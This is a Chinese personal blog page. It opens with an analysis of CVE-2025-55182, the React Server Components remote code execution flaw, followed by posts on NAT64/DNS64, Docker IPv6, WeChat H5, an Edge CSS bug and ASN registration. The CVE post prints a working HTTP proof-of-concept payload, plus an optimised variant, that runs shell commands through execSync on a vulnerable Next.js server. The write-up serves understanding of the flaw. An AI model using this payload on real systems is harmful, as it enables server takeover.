GoForceX's Blog

CVE-2025-55182 是怎么让 Next.js 大爆的？

GoForceX — Wed, 10 Dec 2025 05:33:50 GMT

本文原为组内分享内容，搬运后有部分改动 :P

RSC / Server Functions

RSC，全称 React Server Component，看名字就知道是用来做 SSR 用的。在 RSC 中，有一个功能被称作 Server Functions，可以让客户端调用服务端的异步方法。

而为了让客户端与服务端进行交互，就需要设定一套协议来序列化数据，并通过网络传输。

而 React（还有 Next.js 等）使用的就是 React Flight Protocol。

React Flight Protocol

顾名思义，Flight 这个词语的意思是指航班;飞行; 的意思。代表它承载了 React 客户端与服务端的通信。虽然如此重要，但它却是一个似乎没有什么文档的内部协议，至少我找了很久都没找到官方有什么文档。

它的功能十分强大，可以传输各种数据，而这也包括传输 Component。

在 React 进行 SSR 时，服务端不仅生成了 DOM，为了保证客户端 bundle 中的 React 框架正常工作，服务端也同时生成了虚拟 DOM。而这两份几乎相同的 DOM 被打包到 HTML 中，被一起发给了客户端。

拿冰岩小卖部举个例子：

可以看到，上面有看起来很正常的 DOM，而下面不知道为什么有一堆 self.__next_f.push([1, "xxx"])，这些就是经过 Flight Protocol 序列化后的虚拟 DOM 树，以及一些必要的数据。

如果把里面的这些“乱码”提取出来，可以看到它们分为很多行（每一行称为一个 Chunk），而每行大概都是长这个样子的：

[chunk id]:[Flag][object]

在冒号之前，是一个用来标注 Chunk 编号的 16 进制数字，而后面则有可选的 Flag 和实际传输的数据（可以是 string, object 等）。

我们可以使用一些第三方工具来反序列化这些数据，从而对其进行解析，比如用 https://rsc-parser.vercel.app/。

比如说，这一串：

0:["$","div",null,{"children":["$","p",null,{"children":"Bingyan","id":"wtf"}]}]

会先被解析成如下的 JSON Object，

{
 "type": "model",
 "id": "0",
 "value": {
  "type": "div",
  "key": null,
  "props": {
   "children": {
    "type": "p",
    "key": null,
    "props": {
     "children": "Bingyan",
     "id": "wtf"
    }
   }
  }
 },
 "originalValue": "[\"$\",\"div\",null,{\"children\":[\"$\",\"p\",null,{\"children\":\"Bingyan\",\"id\":\"wtf\"}]}]",
 "timestamp": 0
}

而这就代表了如下的 DOM：


  Bingyan

同时，Flight Protocol 也支持在 Chunk 间互相引用。在解析时会从第 0 个 Chunk 开始逐步解引用。

例如，我们现在有三个 Chunk：

0:"$1"
1:{"group":"frontend","availability":"$2:stacks:react"}
2:{"active":"true","stacks":{"react":"true","angular":"false"}}

在经过一段 parse 之后，这三个 Chunk 分别被解析为

{
 "type": "model",
 "id": "0",
 "value": {
  "$$type": "reference",
  "id": "1",
  "identifier": "",
  "type": "Reference"
 },
 "originalValue": "\"$1\"",
 "timestamp": 0
}

{
 "type": "model",
 "id": "1",
 "value": {
  "group": "frontend",
  "availability": {
   "$$type": "reference",
   "id": "2",
   "identifier": "",
   "type": "Reference"
  }
 },
 "originalValue": "{\"group\":\"frontend\",\"availability\":\"$2:stacks:react\"}",
 "timestamp": 0
}

{
 "type": "model",
 "id": "2",
 "value": {
  "active": "true",
  "stacks": {
   "react": "true",
   "angular": "false"
  }
 },
 "originalValue": "{\"active\":\"true\",\"stacks\":{\"react\":\"true\",\"angular\":\"false\"}}",
 "timestamp": 0
}

随后再经过解引用，变成了如下的 Object：

{ "group": "frontend", "availability": "true" }

React Flight Protocol 的引用功能十分强大，它不仅支持直接引用 object，也可以通过 flag 标记来改变引用的方式。例如 $1 是默认的引用方式，$L1 用于 lazy load 引用 Server Component……

对于默认的 $1 引用方式，React 会在内部先对目标 Chunk 进行反序列化，再进行解析。如果对应的 Chunk 是一个 Promise/Thenable，React 会在其 resolve 后返回 resolve 后的得到的结果。

而与本次 CVE 相关的则是形如 $@1 这样的引用方式。这种引用方式在 React 中一般被用来传递 Promise，也就是说，此时我们不希望其已经是 resolve 后的真实值，而是希望得到这个 Promise object。而在代码实现中则是这样的。

const id = parseInt(value.slice(2), 16);
const chunk = getChunk(response, id);
return chunk;

可见，我们在获取到这个 Chunk 后没有对其进行 await，而是直接返回了其原本的值，也就是说这个实现只是返回了一个 raw Chunk。

Flight Protocol 还支持 Blob Map Set 等的传输和引用。画个重点在这里，这个会很有用。

我们来看看 PoC 吧！

POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 459

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSync('xcalc');","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

这是我从 ↓ 抄来的。如果你水群了的话应该已经看过这个了。

https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3

我们忽略不重要的那些信息，而是提取出下面传输的 Chunks 来分析一下：

0:{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSync('xcalc');","_formData":{"get":"$1:constructor:constructor"}}}
1:"$@0"

如上，一共两行。我们重点来看一下第 0 个 Chunk。

{
    "then": "$1:__proto__:then",
    "status": "resolved_model",
    "reason": -1,
    "value": "{\"then\":\"$B1337\"}",
    "_response": {
        "_prefix": "process.mainModule.require('child_process').execSync('xcalc');",
        "_formData": {
            "get": "$1:constructor:constructor"
        }
    }
}

是不是感觉一头雾水呢？那我们就从头开始，试着一步一步构建出这个 Chunk 吧。

Let's think step by step.

引用到底有多厉害？

还记得前面写的那个示例 Chunk 吗？为了访问其他 Chunk 的 property，我们使用了类似这样的方式：$1:prop。而 React 在代码中，对于访问一个 Chunk 内的 property，代码大概是这样的：

export function requireModule(metadata: ClientReference): T {
  const moduleExports = parcelRequire(metadata[ID]);
  return moduleExports[metadata[NAME]];
  ...
}

也就是说，我们对 Chunk 做了一个 chunk['prop'] 的操作。而对传入的 property 名称没有做任何检查。这样，我们就可以通过这种访问拿到程序不想让我们拿到的值，比如 __proto__ 和 constructor 等。

而更进一步，我们还可以通过循环引用，在 Chunk 内部拿到自身的 property。

0:["$1:__proto__"]
1:"$@0"

我们在 Chunk 0 中引用 Chunk 1，而我们又通过 $@0 的引用使 $1 指向 Chunk 0 本身，从而拿到自身的 property。

如何运行我们传入的代码？

我们传入的代码是 string，怎么让它能在服务端运行呢？

常见的方式有两种。

eval('console.log(1)')
Function('console.log(1)')()

遗憾的，我们很难拿到 eval。幸运的，我们很容易就能拿到 Function constructor。

还记得上面讲引用的时候提到可以拿到某个值的 constructor 吗？我们只需要更进一步就可以了。如果我们可以通过引用拿到一个 Object，就可以通过 $:constructor:constructor 拿到 Function constructor。毕竟 constructor 本身也是一个 Function。

喜欢异步的孩子们有福了！

在 React 的实现中，decode Chunk 的其中一步是一个异步操作。

它大概长这个样子：

boundActionArguments = await decodeReplyFromBusboy(
    busboy,
    serverModuleMap,
    { temporaryReferences }
)

而其中，decodeReplyFromBusboy 的返回值是完成解引用的 Chunk object。

于是我们想到，能不能利用一下 JS 的特性呢？

顺带一提，因为很多历史遗留问题，可以进行异步操作的不仅只有 Promise。只要一个 Object 实现了 then() 方法，都可以被 await，且这一操作就相当于 new Promise(obj.then)。

打个比方，如果这样：

obj = {then: function (resolve, reject) {resolve(1)}}

那么 await obj 的效果就和 new Promise(obj.then) 一样。

又众所周知，JS 的 Promise，或者说 Thenable，是可以嵌套的。

假如我们写了一个看似人畜无害的方法 test……

async function test(data) {
    return data
}

这时我们执行 await test(1)，就会返回 1。看起来没什么问题对吧。

那如果我传的 data 是 new Promise((resolve) => {console.log("wow"); resolve(1)}) 呢？

这时 test 方法不仅返回了 1，并且还执行了 console.log("wow")。

我觉得这样很反直觉，而且用户如果故意搞你的话，还不太容易被发现。

所以我们这次也会用到这个。

重新看一下 React 的代码吧，它是长这个样子的。而且decodeReplyFromBusboy 的返回值是完成解引用的 Chunk object。

boundActionArguments = await decodeReplyFromBusboy(
    busboy,
    serverModuleMap,
    { temporaryReferences }
)

那么，我们就可以构造一个实现了 then 方法的 Chunk，从而执行我们想要的代码。

Let's start from here!

嘻嘻，事已至此，我们直接把 Function constructor 塞到 then 里，是不是就可以了？

遗憾的，不行。

如果我们试图 await {"then": Function} 或者 new Promise(Function)，就会产生一个 SyntaxError，这是 V8 引擎内部实现导致的，我们无法绕过。

0:{"then": "$1:__proto__:then"}
1:"$@0"

既然如此，我们就需要想想怎么才能借助这些疏漏，找到一个方法让我们利用，而且这个方法还需要和 Chunk 的实现有关。最终，研究者找到的方法是 Chunk.prototype.then。

0:{"then": "$1:__proto__:then", "status": "resolved_model"}
1:"$@0"

我们来看看 Chunk.prototype.then 的实现吧。

https://github.com/facebook/react/blob/ae74234eae6ebd62f19190731278e20bc1c37d51/packages/react-server/src/ReactFlightReplyServer.js#L127

Chunk.prototype.then = function (
  this: SomeChunk,
  resolve: (value: T) => mixed,
  reject: (reason: mixed) => mixed,
) {
  const chunk: SomeChunk = this;
  // If we have resolved content, we try to initialize it first which
  // might put us back into one of the other states.
  switch (chunk.status) {
    case RESOLVED_MODEL:
      initializeModelChunk(chunk);
      break;
  }
  ...
 }

如果 status 是 resolved_model，我们就会进入 initializeModelChunk 方法，继续向下。

https://github.com/facebook/react/blob/ae74234eae6ebd62f19190731278e20bc1c37d51/packages/react-server/src/ReactFlightReplyServer.js#L446

function initializeModelChunk(chunk: ResolvedModelChunk): void {
  ...
  const rootReference =
    chunk.reason === -1 ? undefined : chunk.reason.toString(16);

  const resolvedModel = chunk.value;
  
  try {
    const rawModel = JSON.parse(resolvedModel);

    const value: T = reviveModel(
      chunk._response,
      {'': rawModel},
      '',
      rawModel,
      rootReference,
    );
    ...
  } catch {
    ...
  }
  ...
}

观察代码，我们首先会发现的是，我们需要设置 chunk.reason 为 -1，不然代码在

const rootReference =
    chunk.reason === -1 ? undefined : chunk.reason.toString(16);

这里就已经爆掉了。

然后，我们还需要设置 chunk.value 为一个 JSON，chunk._response 为某些值，现在我们还没有什么头绪。

于是现在我们的 Chunk 0 大概长这个样子：

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "",
  "_response": {}
}

而在 initializeModelChunk 中，

const rawModel = JSON.parse(resolvedModel);

const value: T = reviveModel(
  chunk._response,
  {'': rawModel},
  '',
  rawModel,
  rootReference,
);

我们调用了 reviveModel 方法，我们来看看这个方法都干了什么。

https://github.com/facebook/react/blob/ae74234eae6ebd62f19190731278e20bc1c37d51/packages/react-server/src/ReactFlightReplyServer.js#L386

function reviveModel(
  response: Response,
  parentObj: any,
  parentKey: string,
  value: JSONValue,
  reference: void | string,
): any {
  if (typeof value === 'string') {
    // We can't use .bind here because we need the "this" value.
    return parseModelString(response, parentObj, parentKey, value, reference);
  }
  ...
  if (typeof value === 'object' && value !== null) {
    ...
    if (Array.isArray(value)) {
      ...
    } else {
      for (const key in value) {
        if (hasOwnProperty.call(value, key)) {
          const childRef =
            reference !== undefined && key.indexOf(':') === -1
              ? reference + ':' + key
              : undefined;
          const newValue = reviveModel(
            response,
            value,
            key,
            value[key],
            childRef,
          );
          if (newValue !== undefined) {
            // $FlowFixMe[cannot-write]
            value[key] = newValue;
          } else {
            // $FlowFixMe[cannot-write]
            delete value[key];
          }
        }
      }
    }
  }
  ...
}

在这里我们的 value 是 object 类型，React 会拆出 object 内的所有 key-value 对，并分别执行 reviveModel，而在第二次执行的时候，这里的 value 就不一定是 object，而可能是其他类型了。

如果是 string，我们继续看 parseModelString 的实现。

https://github.com/facebook/react/blob/ae74234eae6ebd62f19190731278e20bc1c37d51/packages/react-server/src/ReactFlightReplyServer.js#L916

这个方法代码太长，这里就不放全部了。这个方法大概的用处是对引用进行解析。

进行了一番搜索之后，就会发现这里对 Blob 类型的处理有一些可乘之机，实现是这样的。

case 'B': {
  // Blob
  const id = parseInt(value.slice(2), 16);
  const prefix = response._prefix;
  const blobKey = prefix + id;
  // We should have this backingEntry in the store already because we emitted
  // it before referencing it. It should be a Blob.
  const backingEntry: Blob = (response._formData.get(blobKey): any);
  return backingEntry;
}

那么，如果我们把 chunk._response._formData.get 重载为 Function constructor，而 chunk._response._prefix 重载为我们需要执行的代码，并且对其进行构造使在后面加上 id 后仍可以执行，我们就能让 parseModelString 返回一个 Function 对象。

{
    "then": "$1:__proto__:then",
    "status": "resolved_model",
    "reason": -1,
    "value": "{\"then\":\"$B1337\"}",
    "_response": {
        "_prefix": "process.mainModule.require('child_process').execSync('xcalc');",
        "_formData": {
            "get": "$1:constructor:constructor"
        }
    }
}

于是我们便得到了这个 PoC。

这里我们构造的 value 值是 {"then": "$B1337"}。后面的数字不重要。这个 value，在 parse 之后，它的值就会变成 {"then": Function"}，同样也是一个 Thenable。这里的 Function 就是我们构造的，包含任意代码的 Function 实例。

在 value 被一路回传的同时，这时 chunk.status 也因 parse 结束而变为 INITIALIZED。

Chunk.prototype.then = function (
  this: SomeChunk,
  resolve: (value: T) => mixed,
  reject: (reason: mixed) => mixed,
) {
  // The status might have changed after initialization.
  switch (chunk.status) {
    case INITIALIZED:
      resolve(chunk.value);
      break;
    ...
  }
  ...
}

最终，这个 Thenable 被 resolve 回传，并因为 JS 的特性而被执行。

Game over.

还能优化一下吗？

{
    "then": "$1:then",
    "status": "resolved_model",
    "reason": 0,
    "value": "{\"then\":\"$B\"}",
    "_response": {
        "_prefix": "process.mainModule.require('child_process').execSync('xcalc');",
        "_formData": {
            "get": "$1:then:constructor"
        }
    }
}

References

https://github.com/msanft/CVE-2025-55182

https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3

https://tonyalicea.dev/blog/understanding-react-server-components/

https://gist.github.com/12joan/eb606fb5e5e1c44b0d9d2aacb04112f7

https://x.com/rauchg/status/1997362942929440937

NAT64 / DNS64？尝一下

GoForceX — Wed, 14 May 2025 15:30:33 GMT

本文为《年轻人的第一个 ASN》系列番外……虽然这玩意根本就出了一篇而已。

你说得对……但是为什么要用这个呢？

IPv4？老东西什么时候似啊，都 2025 年了，IPv6 的时代已经到来力！但是众所周知很多大厂因为各种原因仍然不支持 IPv6（比如 GitHub），个人认为 NAT64 是一个非常优雅的方案。
以及，作为一个大学生，经常会用到一些只能在校内使用的服务，如果校园网爆了或者在校外的话就无法使用了。这种情况下就可以在校内布设一个 NAT64 路由器，把校内的 IP 暴露到公网上，就可以爽爽使用了！

Let's start from here!

等等，这些名词都是什么东西？

NAT64

NAT64 是一种通过网络地址转换（NAT）的形式促成 IPv6 与 IPv4 主机间通信的 IPv6 过渡机制。

——NAT64 - Wikipedia

换句话说，这玩意是让 IPv6-only 的主机访问 IPv4 用的。由于 IPv6 的地址空间比 IPv4 大的多，所以我们仅需一段 /96 就可以完成对整个 IPv4 地址空间的映射。这时，我们访问这个映射出来的 IPv6 地址，网关就会帮我们转发到对应的 IPv4 地址上，听起来就很方便对吧。

至于映射方式，有很多种，本篇文章用到的仅为其中最简单的一种。

我们直接拿一段 /96 Prefix，然后把 IPv4 地址拼在最后 32 bits 上，没了。

举个例子，如果前缀是 64:ff9b::/96 的话，我们需要翻译的 IPv4 地址是 192.168.1.1……

我们先把这个 IPv4 地址转成 HEX 吧！192.168.1.1→C0 A8 01 01
然后拼到前缀的后面……64:ff9b::c0a8:101，大功告成！

具体可参见：Section 2 - RFC 6052 - IPv6 Addressing of IPv4/IPv6 Translators

DNS64

DNS64 是指一种专门的 DNS 服务器，在其处理某个域名的 AAAA 记录查询时，如果该域名仅有 A 记录，那么 DNS64 会使用该 A 记录生成出来一项 AAAA 记录。生成出来的 IPv6 地址前缀指向一个 IPv6/IPv4 的转换器，而剩余 32 位嵌入了 A 记录中的 IPv4 地址。指向的转换器通常是一个 NAT64 服务器。

——DNS64 - IPv6过渡机制 - Wikipedia

正如为什么要用 DNS 一样，应该没人会记那个又臭又长的 IP 地址并在脑内自动转换吧。有了 DNS64，我们只需要配置 DNS 就可以直接享受用 IPv6 访问 IPv4 的便利了。

事前准备

一个有双栈访问的 Linux 服务器。
- 如果想用 IPv6 公网段的一段 IP 布设 NAT64 的话，需要一段 /64.
- 如果无所谓的话，可以使用 Well-known Prefix，即 64:ff9b::/96。

配置 NAT64

本文将使用 Jool 进行 NAT64 的配置，在本文中，我们将会使用 2a14:67c1:7f:6464::/96 作为示例 IP 段，请不要直接套用这里的配置，也不要试图访问这个 IP 段，这段 IP 上什么都没有。

Jool 是一个开源的 SIIT/NAT64 配置工具，官网在这里，根据你服务器的系统，跟着文档进行安装就好了。

安装好了？Jool，启动！

$ modprobe jool
$ jool instance add "nat" --netfilter --pool6 2a14:67c1:7f:6464::/96

哈↑哈↑，然后就没了。

如果你需要持久化这里的配置，根据你服务器的系统，查阅 Jool 官方文档中的配置方案就好了。

用另一个设备测试一下？由于我们使用了一段 /96 Prefix，所以可以直接使用 {prefix}:{ip} 作为最后的 IP，举个例子的话，比如说 2a14:67c1:7f:6464::192.168.1.1 ，无需自行转换成 HEX 了。

试试 HTTP，比如 GitHub 呢？

我们先用 dig github.com 获取到 github.com 的 A 记录指向 20.205.243.166。
curl http://github.com -vvv --resolve github.com:443:[2a14:67c1:7f:6464::20.205.243.166]

It works! 如果你还是不能访问，可以试试重启服务器或重新配置 Jool。

配置 DNS64

你说得对，但是好难用啊，每次都要配置这个长的要命的 --resolve ，那有没有开箱即用的方案呢？

有的，兄弟，有的。在本文中，我们将会使用 bind 搭建我们的 DNS64 服务。

用 apt-get install bind9 安装 bind，具体命令因系统而异。
用你最爱的文本编辑器打开 /etc/bind/named.conf.options ，将下面的内容狠狠塞入，记得把 Prefix 改成你实际用的：

options {
    directory "/var/cache/bind";
    dnssec-validation auto;
    auth-nxdomain no;
    listen-on { any; };
    listen-on-v6 { any; };

    allow-query {any;};
    dns64 2a14:67c1:7f:6464::/96 {
        clients { any; };
        mapped { any; };
        suffix ::;
    };
};

最后，用 systemctl restart named 重启 bind 服务，就大功告成了！

写在最后

嘻嘻，是不是很简单呢（迫真）

使用时需要注意，如果你使用了一段公网 IP 的话，那么你网关服务器上能访问到的所有 IP 都会被暴露到公网上，包括你内网里的妙妙服务，需要注意安全喵！

记一次尝试在 Docker 上启用 IPv6 访问的顶级折磨

GoForceX — Sun, 19 Jan 2025 14:51:40 GMT

Last-Modified: 2025-02-07

系统环境: Debian 12, 1Panel 1.10.22-lts, Docker 27.4.1

严格的讲，这一篇应该是组网系列的一篇番外。

因为我的网络配置比较神秘，文内遇到的绝大多数问题应该不会困扰到你，但是如果你的网络也像我一样神秘，那你可以看下去了。

1 客观条件与需求

为了给自己用上妙妙 AdGuard Home，于是月初的时候就给闲置的宁波 800M 带宽服务器上装好了 AdGuard Home。DoH 用起来非常的美妙，但是很快问题就来了，安卓手机系统只支持 DoT。

DoT (DNS over TLS)，是一种非常安全的 DNS 访问方式，它使用 853 端口进行通信，并有完善的鉴权机制，可以有效防止 DNS 抢答与污染（如果你的上游没被污染，并且也用了 DoT/DoH）。

しかし，国内的服务器很多屏蔽了 53/853 端口（比如说前日入手的物语云宁波 800M 大带宽服务器），导致 DoT 和普通的 DNS UDP 53 都处于无法使用的状态。但是懒得再装一次 AdGuard Home 了，于是决定利用之前申请的 ASN，分配一个 IPv6 段给宁波服务器，然后再分出一块给 Docker（对，AdGuard 跑在 Docker 里），Docker 自动分配一个 IPv6 IP 给 container，就能美美用上 DoT 了。

总结一下，大概就是这样：

分配一段 /64 到宁波服务器
给 Docker 配好 IPv6 地址段
给 container 配好网络和路由
开用！

2 地址段分配

有一说一，这段其实是最简单的。

之前已经配好了开箱即用的 Zerotier Network ↓

并且可以自动为每个设备分配一个 /128 地址。

宁波服务器上装好 zerotier-one，加入 Network，就能使用神秘的 IPv6 地址了。

~~至于路由，Zerotier 提供了自由度很高的~~ ~~开放世界~~ ~~Flow Rules 功能，写一条规则就能把你定义好的地址段路由到指定的设备。~~

试了。如果你的需求和我差不多，那可能会产生大大小小的问题，不要用这个。

建议用妙妙 Managed Routes 功能，非常好用。

给服务器分配了两段 IPv6 /64 块，不过我们这次只需要用一个 /80 就完全够用了，鉴于 IPv6 地址太多了，所以浪费一点也没事……吧？

3 嘻嘻我要抄教程

进入 1Panel 一眼就看见了这个非常吸引眼球的 IPv6 按钮。

点击后，跟随 1Panel 的妙妙教程一步一步走，然后把你想添加 IPv6 连通性的容器改到默认的 bridge 网络下，就可以上网了……吗？

答案是确实能上网了，但是 IP 是联不通一点的。

使用 tcpdump 发现，docker 实际上对整个网段做了一个 NAT，至于为什么……只能说不太理解为什么在公网网段上 NAT。

而如果跟着教程创建新的网络，再把容器放到新的网络上，结果也是差不多的。

说实话有点绝望了，跟着 Docker 官方教程又走了一遍，结果连网都上不去了，这下真成低能了。

4 原来就这么简单吗

com.docker.network.bridge.gateway_mode_ipv6=routed

说实话，这篇文章写到这里多少是要虎头蛇尾了，因为解决方法真的很简单。

经过了一段时间的搜索，终于找到了这篇文档。Packet filtering and firewalls

如果创建网络时加上了上面的配置，那么容器对外请求时，主机就不会进行 NAT，而是直接把数据包中转到容器内。

至于端口映射，在 0.0.0.0/127.0.0.1 上映射的端口会正常的映射到 主机的对应端口，而在 :: 上映射的端口 并不会起作用，而是会让 Docker 放通 容器端口，大约就相当于是一个神秘安全组的作用了。

5 总结

再也不想配 Docker IPv6 了，感觉文档写的也很神秘……

当然我也是 Docker 菜鸡，若有问题希望大家多多指出。

根据配置不同，可能还需要配置 NDP 与 ndppd。

待更新文章小本本

GoForceX — Fri, 3 Jan 2025 16:31:17 GMT

一些想更又还没打起兴趣写的东西 ↓

DN42 — 学习组网的一站式平台
年轻人的第一个 ASN 系列
1. Peer, Transit, Upstream, Downstream, IX
2. BGP Session
3. 神秘的全 Zerotier 组网
4. Geofeed 配置，使你 IP 属地朝鲜（或者随便什么地方）

……还有一些说是持续更新但是实际上根本没管的文章。

微信 H5 踩坑记录大全

GoForceX — Thu, 2 Jan 2025 07:23:51 GMT

JS-SDK: 微信网页开发 / JS-SDK说明文档

登录授权: 微信网页开发 / 网页授权

关于分享

目前无法获取用户 分享朋友圈 / 分享给朋友 的状态。

虽然很离谱，但是文档里写着 即将废弃 的四个接口其实都用不了。

以及，如果你是点击链接进入 H5，那么分享时也会 以链接而不是卡片的形式 分享。（你配了配置也没用）

以二维码，点击卡片，公众号方式进入时，才能正常以卡片形式分享。

关于登录

登录并非 API，而是直接 重定向 到微信的链接，登录授权后再由微信重定向到先前配置的 redirect_url。

若用户拒绝登录授权，微信会重定向回 发起登录时 的页面，同时扬掉你没有持久化的数据。

关于摇一摇

苹果手机需要获取权限。

DeviceMotionEvent.requestPermission();

需要注意的是，只能在用户操作的回调中调用，无用户操作时调用无效。

Edge 浏览器 bug 定位——使我的 GitHub 界面被压扁

GoForceX — Fri, 6 Dec 2024 15:13:44 GMT

132.0.2957.55 版本中确认已修复。

测试环境：Microsoft Edge 132.0.2957.26 (Beta Channel)

测试时间：2024/12/6 18:00

复现难度：极低

1 发现问题

大概是半个月之前的某天，我像往常一样打算打开 GitHub 看一眼项目的分支列表。

然后就被开幕雷击了。

是的，分支的名字都被压扁了，而且表头看起来也不太正常的样子。

作为对比，正常的页面是这样的：

尝试 Chrome 和 Firefox（一个前端人怎么可能只装了一个浏览器！），发现根本没有问题。

果然还是 Edge 全责，打开 DevTools，找到文字所在的 div 元素，进入 Computed 选项卡，瞬间就发现了几个不太对劲的属性。

height: 0.604167px

line-height: 0.6px

很明显，问题出在 line-height 属性。此时，它的值为 calc(20 / var(--table-font-size)) 。

鉴于 --table-font-size 的值为 0.75rem，而此时的 font-size 为 16px，line-height 的值大概就是 calc(20 / 12px) 了。

根据 CSS 规范（calc() - CSS：层叠样式表 | MDN），

除法，除数（/ 右面的数）必须是。

理论上这是个无效的属性值，但是实际上它却被 Edge 计算成了 0.6px 这个抽象数字。

试图用各种算法计算这个值无果后，遗憾的放弃了问题定位。

2 问题定位

在被折磨了半个月之后，我终于忍不了了。

在一个很闲的下午，我打开网上随便找的一个 CSS Playground，怀着沉重的心情输入了：



  
    
    
    
  
  
    F**k Microsoft Edge

body {
  background: #ffffff;
  display: flex;
  justify-content: center;
  align-items: center;
  font-size: 16px;
}

p {
  font-size: 0.75rem;
  line-height: calc(20 / 0.75rem);
  overflow: hidden;
}

果然复现出来了。line-height: 0.6px 也是完全一致。

↑希望你能看见这一行抽象的点↑

然后脑抽了在 calc 后面的被除数后面加了个 0。

line-height: calc(200 / 0.75rem);

显示效果完全没有变化。对于一个无效的属性值，这是完全合理的。

但是 Computed 选项卡中的 line-height 值却变成了 0.06px 。

被除数 x10，值反而小了 10 倍？怎会如此呢？

这时，我们就能大概猜到原因了。

在多次改变被除数与除数后，不难发现，在：

被除数为 number
除数为 length

时，巨硬的阴间优化会认为你不慎把被除数和除数写反了，于是贴心的帮你换回来。

这就是为什么 line-length 是 0.6px，因为 12px / 20 == 0.6px。

3 结语

所以，真的不要进行 CSS 规范外的操作。

鉴于你跟着规范走都会有巨量的浏览器兼容性问题，不跟着规范走绝对会让你爽到姥姥家。

4 课后作业

:root { font-size: 32px; }
p { line-height: calc(20 / 12rem); }
计算后的 line-height 是多少？

好吧我已经编不下去了。希望永远不会有人再碰到这个抽象问题了。

5 为什么还有？

附上美丽的故事一则。

勿问为什么没有 Edge，Edge 已经被巨硬压扁了。

年轻人的第一个 ASN——（1）准备与申请

GoForceX — Sat, 30 Nov 2024 08:54:18 GMT

观前须知：

这并非儿戏，不仅需要大量的时间、精力、金钱，而且如果出现配置错误，也有可能会造成互联网的部分混乱。

如果你并没有 BGP 配置经验，或者你只是冲动决定，那么建议你了解一下 DN42 Wiki - Home，DN42 是一个实验性的网络，专为实验和学习互联网技术而生，玩一段时间学会基本操作，再去公网操作，才能减少问题的发生。

如果你已经决定好了要成为一位 BGPlayer（或者你是来图一乐的），那就继续往下看吧。

0 一些前置知识

0.1 谁负责这些事？

既然说到 ASN 申请，就不得不提到一些概念了。

RIR: Regional Internet Registry - 区域性互联网注册机构

现在全世界仅有五家，分别负责非洲 (AFRINIC)、北美 (ARIN)、拉美 (LACNIC)、欧亚 (RIPE NCC)、亚太地区 (APNIC) 的互联网资源分配。

LIR: Local Internet Registry - 本地互联网注册机构

有时候也被称为“大会员”，LIR 找 RIR 申请资源，然后再分配给 LIR 的客户，大致就是这么运作的。

LIR 是 RIR 的会员，每年需要交很多年费才能维持会员身份，明显是个人玩家无法承受的。

那么留给我们的路就只有一条了，找 LIR 帮自己申请 ASN、分配 IP 资源。

太长不看：目前建议在 RIPE NCC 注册 ASN。

你可能想说，作为一个中国人，应该找 APNIC 申请资源吧？是，也不是。

如果一家公司仅在国内开展服务，那其实应该找 CNNIC 申请资源。CNNIC 是一个 NIR (National Internet Registry, 国家性互联网注册机构)，负责管理国内的互联网资源分配。

言归正传，为什么不建议在 APNIC 注册 ASN 呢？APNIC 的价格相较 RIPE 而言贵一些（即使 RIPE 大涨价之后也是这样），而且有很多操作只能通过发邮件才能完成。而 RIPE NCC 当前的 ASN 年费是 50 EUR/y，LIR 一般来说还会涨一些价，毕竟 LIR 也要赚钱的；且 RIPE NCC 可以通过网页端进行很多操作，非常的便利。

0.2 成本如何呢？

如果你还是想申请 APNIC 的 ASN，那么你可以参考：ZX LIR 服务

提供 RIPE NCC 的 LIR 服务的商家有很多，你可以自行选择靠谱、性价比高的商家。

作为参考，我现在找的 LIR 收取 65 USD/y (大约 470 CNY) 的费用。

0.3 IPv4 or IPv6？

除非你是很富的富哥，大概率是负担不起 IPv4 Block 的高价的。

很多 LIR 在注册时会附赠 /44 - /48 不等的 IPv6 PA Block，具体的量随 LIR 而定。

如果以后想添加 IPv6 PA 块，价格也不会很高。

0.4 PA or PI？

PA: Provider Aggregatable

PI: Provider Independent

一言以蔽之：PA 块 是你 LIR 注册的，你申请到的 PA Block 是你 LIR 资源的一部分；PI 块 就恰好相反，是你自己申请来的资源。

一般来说 PA 较为廉价，而 PI 很贵，除非你是富哥不然十分不建议。

0.5 实名上网？

如果你以自己个人身份提交申请，那所有人都能通过你的 IP 查到你的真名、地址、联系方式等资料。

注册公司的话就不会有这么大的隐私问题，但是也会增加麻烦。

1 具体流程

1.1 一些准备

根据 LIR 商家不同，准备流程与材料有很大区别。

一定要提交的资料包括：

（个人身份）你的身份证正反面 / 护照照片（一般是二选一，需要你在 iDenfy 上认证）
（公司身份）你公司的注册文件等
RIPE 管理区内的网络活动证明（你欧洲 VPS 的发票，也有可能会被要机房地址等信息）
你的联系方式（姓名、电子邮件、地址等）

有的商家提供一条龙服务，但有的商家并不会帮你建立 RIPE DB 条目，在申请前要和 LIR 问清楚。

材料清单可参考：ASN 申请快速指北 - RIPE NCC，但还是要以自己找的 LIR 为准。

1.2 申请流程

按照你 LIR 的要求提交材料，交钱
和 LIR 签协议
LIR 把材料全部交到 RIPE
等（指 Wait）

LIR 提交材料后，如果你是以个人身份申请，那么 LIR 会给你发一个 iDenfy 的认证链接，尽快用身份证验证就好。

中途如果你的材料有问题，RIPE 可能会要求你提供补充材料，属实是中奖了（我就中奖了）

总之别急，LIR 提交材料后大约 1-3 个工作日你就会知道下一步进展了。

RIPE 审核结束后，你的 LIR 就会收到同意发放 ASN 的通知，然后 LIR 会把消息转给你。

Today, the RIPE NCC assigned the following Autonomous System Number:

ASxxxxxx to xxxxxxx

~~当然，你也可以每天去 RIPE 的网页视奸（~~

1.3 然后呢？

拿到 ASN 可以说是只是完成了万里长征的 第一步。

